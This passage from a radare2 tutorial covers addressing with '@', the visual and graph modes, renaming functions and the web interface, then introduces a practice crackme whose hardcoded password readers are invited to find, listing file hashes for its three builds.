Nearly all radare commands which operates on addresses (like disassmble) allow to use an argument to specify a different position instead of the current one by using an @. Therefore a

pdf @sym.main

produces the same result. You like the tree view of IDA? Enter the visual mode of radare by entering V. Now you see an hexeditor were you can navigate through. By typing ?, you’ll get a list of possible keyshortcuts for this mode. Press V (capital v) to get this:

Graph view of /bin/true
Graph view of /bin/true

Awesome, isn’t it? Now let’s rename the function fcn.00401510 in our disassembly to a more meaningful name. This could either be done by

s fcn.00401510

afn better_name

Or by using

afn better_name fcn.00401510


afn better_name 0x00401510


afn better_name @fcn.00401510


afn better_name @0x00401510


If you’re a little afraid of this huge amount of command line fu, you could also try the webinterface:

r2 -c=H your_binary

Which gets you this:

Radare 2 Web interface

Challenge 0x01

You will find the first challenge here (linux64 dynamically linked, linux64 statically linked, win64):


MD5 (challenge01) = b6449993d4278f9884f45018fc128d15
MD5 (challenge01.exe) = 1d78ad3807163cfb7b5194c1c22308c4
MD5 (challenge01-static) = 833cdfe2b105dfda82d3d4a28bab04bd
SHA1 (challenge01) = 55d7755be8ea872601e2c22172c8beccefca37cc
SHA1 (challenge01.exe) = 108837eeffb6635aa08e0d5607ba4d502d556f32
SHA1 (challenge01-static) = 2ad83f289e94c3326d3729fc2c04f32582aba8a3
SHA256 (challenge01) = 56f239d74bdafd8c2d27c07dff9c66dc92780a4742882b9b8724bce7cc6fb0d1
SHA256 (challenge01.exe) = 9ef57cbd343489317bef66de436ebe7544760b48414ca2247ced1ce462b4591d
SHA256 (challenge01-static) = 99f15536cc8a4a68e6211c3af6a0b327c875373659bf7100363319e168c0deb7


Your goal is to find the correct password for the login in the binary (hint: hardcoded passwords are bad) . Next time I’ll give you a walkthrough for the challenge and challenge #2.

Happy reversing!